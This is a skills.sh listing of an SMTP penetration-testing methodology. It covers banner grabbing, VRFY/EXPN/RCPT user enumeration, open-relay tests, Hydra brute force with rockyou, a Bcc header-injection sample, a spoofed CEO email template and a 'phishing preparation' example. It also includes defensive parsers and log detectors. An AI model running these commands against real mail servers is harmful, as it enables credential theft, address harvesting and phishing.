SMTP Penetration Testing

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Install skill "smtp penetration testing" with this command: npx skills add jpropato/siba/jpropato-siba-smtp-penetration-testing

Purpose

Conduct comprehensive security assessments of SMTP (Simple Mail Transfer Protocol) servers to identify vulnerabilities including open relays, user enumeration, weak authentication, and misconfiguration. This skill covers banner grabbing, user enumeration techniques, relay testing, brute force attacks, and security hardening recommendations.

Prerequisites

Required Tools

Nmap with SMTP scripts

sudo apt-get install nmap

Netcat

sudo apt-get install netcat

Hydra for brute force

sudo apt-get install hydra

SMTP user enumeration tool

sudo apt-get install smtp-user-enum

Metasploit Framework

msfconsole

Required Knowledge

  • SMTP protocol fundamentals

  • Email architecture (MTA, MDA, MUA)

  • DNS and MX records

  • Network protocols

Required Access

  • Target SMTP server IP/hostname

  • Written authorization for testing

  • Wordlists for enumeration and brute force

Outputs and Deliverables

  • SMTP Security Assessment Report - Comprehensive vulnerability findings

  • User Enumeration Results - Valid email addresses discovered

  • Relay Test Results - Open relay status and exploitation potential

  • Remediation Recommendations - Security hardening guidance

Core Workflow

Phase 1: SMTP Architecture Understanding

Components: MTA (transfer) → MDA (delivery) → MUA (client)

Ports: 25 (SMTP), 465 (SMTPS), 587 (submission), 2525 (alternative)

Workflow: Sender MUA → Sender MTA → DNS/MX → Recipient MTA → MDA → Recipient MUA

Phase 2: SMTP Service Discovery

Identify SMTP servers and versions:

Discover SMTP ports

nmap -p 25,465,587,2525 -sV TARGET_IP

Aggressive service detection

nmap -sV -sC -p 25 TARGET_IP

SMTP-specific scripts

nmap --script=smtp-* -p 25 TARGET_IP

Discover MX records for domain

dig MX target.com

nslookup -type=mx target.com

host -t mx target.com

Phase 3: Banner Grabbing

Retrieve SMTP server information:

Using Telnet

telnet TARGET_IP 25

Response: 220 mail.target.com ESMTP Postfix

Using Netcat

nc TARGET_IP 25

Response: 220 mail.target.com ESMTP

Using Nmap

nmap -sV -p 25 TARGET_IP

Version detection extracts banner info

Manual SMTP commands

EHLO test

Response reveals supported extensions

Parse banner information:

Banner reveals:

  • Server software (Postfix, Sendmail, Exchange)
  • Version information
  • Hostname
  • Supported SMTP extensions (STARTTLS, AUTH, etc.)

Phase 4: SMTP Command Enumeration

Test available SMTP commands:

Connect and test commands

nc TARGET_IP 25

Initial greeting

EHLO attacker.com

Response shows capabilities:

250-mail.target.com
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-8BITMIME
250 DSN

Key commands to test:

VRFY - Verify user exists

VRFY admin
250 2.1.5 admin@target.com

EXPN - Expand mailing list

EXPN staff
250 2.1.5 user1@target.com
250 2.1.5 user2@target.com

RCPT TO - Recipient verification

MAIL FROM:<test@attacker.com>
RCPT TO:<admin@target.com>

250 OK = user exists

550 = user doesn't exist
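The EHLO reply and the VRFY/EXPN/RCPT TO replies above are easy to capture but tedious to read by hand. The following parser is an added example (not part of the SKILL.md): it turns a captured EHLO reply into a capability map, reports the findings a hardening review would raise from it (VRFY advertised, AUTH PLAIN/LOGIN offered before STARTTLS), and classifies probe replies, including the 252 and 4xx codes that the 250/550 rule above does not cover. The sample reply is constructed from the one shown on this page.

```python
# Added example (not from the SKILL.md): assess a captured EHLO reply and classify probe replies.
# Constructed sample: the EHLO reply shown on this page, one line per 250- entry.
SAMPLE_EHLO = """250-mail.target.com
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-8BITMIME
250 DSN"""

def parse_ehlo(text):
    """Return (hostname, {EXTENSION: [params]}); '250-' = more lines follow, '250 ' = last."""
    lines = text.strip().splitlines()
    if not lines or not lines[0].startswith("250"):
        raise ValueError("not an EHLO success reply")
    caps = {}
    for line in lines[1:]:
        if not line.startswith(("250-", "250 ")):
            raise ValueError(f"malformed reply line: {line!r}")
        keyword, *params = line[4:].split()
        caps[keyword.upper()] = params
    return lines[0][4:].split()[0], caps

def assess_ehlo(caps, tls_active=False):
    """Findings as (severity, message), with severities from the page's vulnerability table."""
    findings = []
    if "VRFY" in caps:
        findings.append(("Medium", "VRFY enabled: user enumeration possible"))
    if "EXPN" in caps:
        findings.append(("Medium", "EXPN enabled: alias expansion possible"))
    if "STARTTLS" not in caps and not tls_active:
        findings.append(("Medium", "no STARTTLS: session stays plaintext"))
    clear = [m for m in caps.get("AUTH", []) if m in ("PLAIN", "LOGIN")]
    if clear and not tls_active:  # AUTH advertised before TLS: credentials can cross in clear
        findings.append(("High", "AUTH " + " ".join(clear) + " offered before STARTTLS"))
    return findings

def classify_probe(reply):
    """Outcome of a VRFY/EXPN/RCPT TO reply line, keyed on its 3-digit code."""
    code = reply[:3]
    if code == "250":
        return "valid"
    if code == "252":  # server will not confirm either way (RFC 5321)
        return "unverified"
    if code in ("550", "551", "553"):
        return "invalid"
    return "temporary" if code.startswith("4") else "unknown"  # 4xx: greylisting/rate limiting
```

Run `assess_ehlo` a second time with `tls_active=True` on the EHLO reply captured after STARTTLS; AUTH offered only inside TLS is the expected configuration.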

Phase 5: User Enumeration

Enumerate valid email addresses:

Using smtp-user-enum with VRFY

smtp-user-enum -M VRFY -U /usr/share/wordlists/users.txt -t TARGET_IP

Using EXPN method

smtp-user-enum -M EXPN -U /usr/share/wordlists/users.txt -t TARGET_IP

Using RCPT method

smtp-user-enum -M RCPT -U /usr/share/wordlists/users.txt -t TARGET_IP

Specify port and domain

smtp-user-enum -M VRFY -U users.txt -t TARGET_IP -p 25 -d target.com

Using Metasploit:

use auxiliary/scanner/smtp/smtp_enum
set RHOSTS TARGET_IP
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set UNIXONLY true
run

Using Nmap:

SMTP user enumeration script

nmap --script smtp-enum-users -p 25 TARGET_IP

With custom user list

nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -p 25 TARGET_IP

Phase 6: Open Relay Testing

Test for unauthorized email relay:

Using Nmap

nmap -p 25 --script smtp-open-relay TARGET_IP

Manual testing via Telnet

telnet TARGET_IP 25
HELO attacker.com
MAIL FROM:<test@attacker.com>
RCPT TO:<victim@external-domain.com>
DATA
Subject: Relay Test

This is a test.
.
QUIT

If the external RCPT TO and the message are accepted (250 OK), the server is an open relay

Using Metasploit:

use auxiliary/scanner/smtp/smtp_relay
set RHOSTS TARGET_IP
run

Test variations:

Test different sender/recipient combinations

MAIL FROM:<>
MAIL FROM:<test@[attacker_IP]>
MAIL FROM:<test@target.com>

RCPT TO:<test@external.com>
RCPT TO:<"test@external.com">
RCPT TO:<test%external.com@target.com>

Phase 7: Brute Force Authentication

Test for weak SMTP credentials:

Using Hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt smtp://TARGET_IP

With specific port and SSL

hydra -l admin -P passwords.txt -s 465 -S TARGET_IP smtp

Multiple users

hydra -L users.txt -P passwords.txt TARGET_IP smtp

Verbose output

hydra -l admin -P passwords.txt smtp://TARGET_IP -V

Using Medusa:

medusa -h TARGET_IP -u admin -P /path/to/passwords.txt -M smtp

Using Metasploit:

use auxiliary/scanner/smtp/smtp_login
set RHOSTS TARGET_IP
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwords.txt
set VERBOSE true
run

Phase 8: SMTP Command Injection

Test for command injection vulnerabilities:

Header injection test

MAIL FROM:<attacker@test.com>
RCPT TO:<victim@target.com>
DATA
Subject: Test
Bcc: hidden@attacker.com
X-Injected: malicious-header

Injected content
.

Email spoofing test:

Spoofed sender (tests SPF/DKIM protection)

MAIL FROM:<ceo@target.com>
RCPT TO:<employee@target.com>
DATA
From: CEO <ceo@target.com>
Subject: Urgent Request

Please process this request immediately.
.

Phase 9: TLS/SSL Security Testing

Test encryption configuration:

STARTTLS support check

openssl s_client -connect TARGET_IP:25 -starttls smtp

Direct SSL (port 465)

openssl s_client -connect TARGET_IP:465

Cipher enumeration

nmap --script ssl-enum-ciphers -p 25 TARGET_IP

Phase 10: SPF, DKIM, DMARC Analysis

Check email authentication records:

SPF/DKIM/DMARC record lookups

dig TXT target.com | grep spf # SPF

dig TXT selector._domainkey.target.com # DKIM (replace "selector" with the domain's DKIM selector)

dig TXT _dmarc.target.com # DMARC

SPF policy: -all = hard fail, ~all = soft fail, ?all = neutral
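Reading the "all" qualifier and the DMARC p= tag off raw dig output is where mistakes creep in, so here is an added example (not part of the SKILL.md) that parses the TXT answer lines from the three lookups above and rates the policies using the severities of this page's vulnerability table. The dig output is constructed; target.com is the page's placeholder domain.

```python
# Added example (not from the SKILL.md): classify SPF and DMARC records from dig output.
import re

# Constructed dig answer lines for the lookups shown on this page (target.com is the page's placeholder).
DIG_OUTPUT = '''target.com.  3600 IN TXT "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net ~all"
_dmarc.target.com. 3600 IN TXT "v=DMARC1; p=none; rua=mailto:dmarc@target.com"'''

SPF_ALL = {"-all": "hard fail", "~all": "soft fail", "?all": "neutral", "+all": "pass"}

def txt_records(dig_text):
    """Map owner name -> list of TXT values (quotes stripped, split strings joined)."""
    out = {}
    for line in dig_text.splitlines():
        m = re.match(r'(\S+)\.\s+\d+\s+IN\s+TXT\s+(.*)', line)
        if m:
            out.setdefault(m.group(1), []).append("".join(re.findall(r'"([^"]*)"', m.group(2))))
    return out

def spf_policy(record):
    """Disposition of the record's final 'all' term; no 'all' term means implicit neutral."""
    if not record.startswith("v=spf1"):
        return "missing"
    return SPF_ALL.get(record.split()[-1].lower(), "neutral (no all term)")

def dmarc_policy(record):
    """Value of the p= tag, or 'missing' when there is no valid DMARC record."""
    if not record.startswith("v=DMARC1"):
        return "missing"
    tags = dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)
    return tags.get("p", "missing")  # p= is mandatory; a record without it is not valid DMARC

def assess_domain(dig_text, domain):
    """Findings for the page's 'Missing SPF/DKIM' check, plus weak but present policies."""
    recs = txt_records(dig_text)
    spf = next((r for r in recs.get(domain, []) if r.startswith("v=spf1")), "")
    dmarc = next((r for r in recs.get("_dmarc." + domain, []) if r.startswith("v=DMARC1")), "")
    findings, sp, dp = [], spf_policy(spf), dmarc_policy(dmarc)
    if sp == "missing":
        findings.append(("Medium", "no SPF record"))
    elif sp != "hard fail":
        findings.append(("Low", f"SPF ends with {sp}: spoofed mail is not rejected"))
    if dp == "missing":
        findings.append(("Medium", "no DMARC record"))
    elif dp == "none":
        findings.append(("Low", "DMARC p=none: monitoring only, spoofed mail is still delivered"))
    return findings
```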

Quick Reference

Essential SMTP Commands

| Command | Purpose | Example |
|---|---|---|
| HELO | Identify client | HELO client.com |
| EHLO | Extended HELO | EHLO client.com |
| MAIL FROM | Set sender | MAIL FROM:<sender@test.com> |
| RCPT TO | Set recipient | RCPT TO:<user@target.com> |
| DATA | Start message body | DATA |
| VRFY | Verify user | VRFY admin |
| EXPN | Expand alias | EXPN staff |
| QUIT | End session | QUIT |

SMTP Response Codes

| Code | Meaning |
|---|---|
| 220 | Service ready |
| 221 | Closing connection |
| 250 | OK / Requested action completed |
| 354 | Start mail input |
| 421 | Service not available |
| 450 | Mailbox unavailable |
| 550 | User unknown / Mailbox not found |
| 553 | Mailbox name not allowed |

Enumeration Tool Commands

| Tool | Command |
|---|---|
| smtp-user-enum | smtp-user-enum -M VRFY -U users.txt -t IP |
| Nmap | nmap --script smtp-enum-users -p 25 IP |
| Metasploit | use auxiliary/scanner/smtp/smtp_enum |
| Netcat | nc IP 25, then manual commands |

Common Vulnerabilities

| Vulnerability | Risk | Test Method |
|---|---|---|
| Open Relay | High | Relay test with external recipient |
| User Enumeration | Medium | VRFY/EXPN/RCPT commands |
| Banner Disclosure | Low | Banner grabbing |
| Weak Auth | High | Brute force attack |
| No TLS | Medium | STARTTLS test |
| Missing SPF/DKIM | Medium | DNS record lookup |

Constraints and Limitations

Legal Requirements

  • Only test SMTP servers you own or have authorization to test

  • Sending spam or malicious emails is illegal

  • Document all testing activities

  • Do not abuse discovered open relays

Technical Limitations

  • VRFY/EXPN often disabled on modern servers

  • Rate limiting may slow enumeration

  • Some servers respond identically for valid/invalid users

  • Greylisting may delay enumeration responses

Ethical Boundaries

  • Never send actual spam through discovered relays

  • Do not harvest email addresses for malicious use

  • Report open relays to server administrators

  • Use findings only for authorized security improvement

Examples

Example 1: Complete SMTP Assessment

Scenario: Full security assessment of mail server

Step 1: Service discovery

nmap -sV -sC -p 25,465,587 mail.target.com

Step 2: Banner grab

nc mail.target.com 25
EHLO test.com
QUIT

Step 3: User enumeration

smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t mail.target.com

Step 4: Open relay test

nmap -p 25 --script smtp-open-relay mail.target.com

Step 5: Authentication test

hydra -l admin -P /usr/share/wordlists/fasttrack.txt smtp://mail.target.com

Step 6: TLS check

openssl s_client -connect mail.target.com:25 -starttls smtp

Step 7: Check email authentication

dig TXT target.com | grep spf
dig TXT _dmarc.target.com

Example 2: User Enumeration Attack

Scenario: Enumerate valid users for phishing preparation

Method 1: VRFY

smtp-user-enum -M VRFY -U users.txt -t 192.168.1.100 -p 25

Method 2: RCPT with timing analysis

smtp-user-enum -M RCPT -U users.txt -t 192.168.1.100 -p 25 -d target.com

Method 3: Metasploit

msfconsole
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
run

Results show valid users

[+] 192.168.1.100:25 - Found user: admin
[+] 192.168.1.100:25 - Found user: root
[+] 192.168.1.100:25 - Found user: postmaster

Example 3: Open Relay Exploitation

Scenario: Test and document open relay vulnerability

Test via Telnet

telnet mail.target.com 25
HELO attacker.com
MAIL FROM:<test@attacker.com>
RCPT TO:<test@gmail.com>

If 250 OK - VULNERABLE

Document with Nmap

nmap -p 25 --script smtp-open-relay --script-args smtp-open-relay.from=test@attacker.com,smtp-open-relay.to=test@external.com mail.target.com

Output:

PORT STATE SERVICE

25/tcp open smtp

|_smtp-open-relay: Server is an open relay (14/16 tests)

Troubleshooting

| Issue | Cause | Solution |
|---|---|---|
| Connection Refused | Port blocked or closed | Check port with nmap; ISP may block port 25; try 587/465; use VPN |
| VRFY/EXPN Disabled | Server hardened | Use RCPT TO method; analyze response time/code variations |
| Brute Force Blocked | Rate limiting/lockout | Slow down (hydra -W 5); use password spraying; check for fail2ban |
| SSL/TLS Errors | Wrong port or protocol | Use 465 for SSL, 25/587 for STARTTLS; verify EHLO response |

Security Recommendations

For Administrators

  • Disable Open Relay - Require authentication for external delivery

  • Disable VRFY/EXPN - Prevent user enumeration

  • Enforce TLS - Require STARTTLS for all connections

  • Implement SPF/DKIM/DMARC - Prevent email spoofing

  • Rate Limiting - Prevent brute force attacks

  • Account Lockout - Lock accounts after failed attempts

  • Banner Hardening - Minimize server information disclosure

  • Log Monitoring - Alert on suspicious activity

  • Patch Management - Keep SMTP software updated

  • Access Controls - Restrict SMTP to authorized IPs
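The "Log Monitoring" and "Rate Limiting" items above are only useful if someone turns the MTA's reject lines into alerts. This added example (not part of the SKILL.md) does that for Postfix: it parses NOQUEUE reject lines and flags one client producing a burst of "User unknown" rejects (RCPT-based enumeration, as in Phase 5) or "Relay access denied" rejects (relay probing, as in Phase 6). The log lines are constructed in Postfix's reject format, the client addresses are documentation addresses, and the 60-second window and threshold of 3 are assumed values to tune per site.

```python
# Added example (not from the SKILL.md): flag enumeration and relay-probe bursts in Postfix reject logs.
import re
from collections import defaultdict
from datetime import datetime

# Constructed lines in Postfix's NOQUEUE reject format; 198.51.100.7 and 203.0.113.9 are documentation addresses.
LOG = """\
Mar  3 10:00:01 mx postfix/smtpd[811]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <alice@target.com>: Recipient address rejected: User unknown in local recipient table; from=<test@attacker.com> to=<alice@target.com> proto=ESMTP helo=<attacker.com>
Mar  3 10:00:02 mx postfix/smtpd[811]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <bob@target.com>: Recipient address rejected: User unknown in local recipient table; from=<test@attacker.com> to=<bob@target.com> proto=ESMTP helo=<attacker.com>
Mar  3 10:00:03 mx postfix/smtpd[811]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <carol@target.com>: Recipient address rejected: User unknown in local recipient table; from=<test@attacker.com> to=<carol@target.com> proto=ESMTP helo=<attacker.com>
Mar  3 10:00:04 mx postfix/smtpd[811]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <dave@target.com>: Recipient address rejected: User unknown in local recipient table; from=<test@attacker.com> to=<dave@target.com> proto=ESMTP helo=<attacker.com>
Mar  3 10:00:09 mx postfix/smtpd[811]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 554 5.7.1 <victim@external.com>: Relay access denied; from=<test@attacker.com> to=<victim@external.com> proto=ESMTP helo=<attacker.com>
Mar  3 10:05:40 mx postfix/smtpd[812]: NOQUEUE: reject: RCPT from mail.example.net[203.0.113.9]: 550 5.1.1 <alcie@target.com>: Recipient address rejected: User unknown in local recipient table; from=<pat@example.net> to=<alcie@target.com> proto=ESMTP helo=<mail.example.net>
"""

REJECT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: NOQUEUE: reject: RCPT from "
    r"\S+\[(?P<ip>[\d.]+)\]: (?P<code>\d{3}) (?P<esc>[\d.]+) <(?P<rcpt>[^>]*)>: (?P<reason>[^;]*);")

def parse_rejects(text):
    """One dict per matching reject line; ts is the year-less syslog timestamp."""
    out = []
    for line in text.splitlines():
        m = REJECT.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%b %d %H:%M:%S")
            out.append(d)
    return out

def detect(rejects, window_s=60, threshold=3):
    """Alerts as (ip, kind, count): one client reaching threshold rejects of a kind within window_s."""
    by_key = defaultdict(list)
    for r in rejects:
        if "User unknown" in r["reason"]:
            by_key[(r["ip"], "enumeration")].append(r["ts"])
        elif "Relay access denied" in r["reason"]:
            by_key[(r["ip"], "relay_probe")].append(r["ts"])
    alerts = []
    for (ip, kind), times in by_key.items():
        times.sort()
        # sliding window anchored on each event; report the first window that reaches the threshold
        for i, t0 in enumerate(times):
            n = sum(1 for t in times[i:] if (t - t0).total_seconds() <= window_s)
            if n >= threshold:
                alerts.append((ip, kind, n))
                break
    return alerts
```

The single typo-style reject from 203.0.113.9 stays below the threshold, which is the point: alert on bursts per client, not on every unknown recipient.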

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.
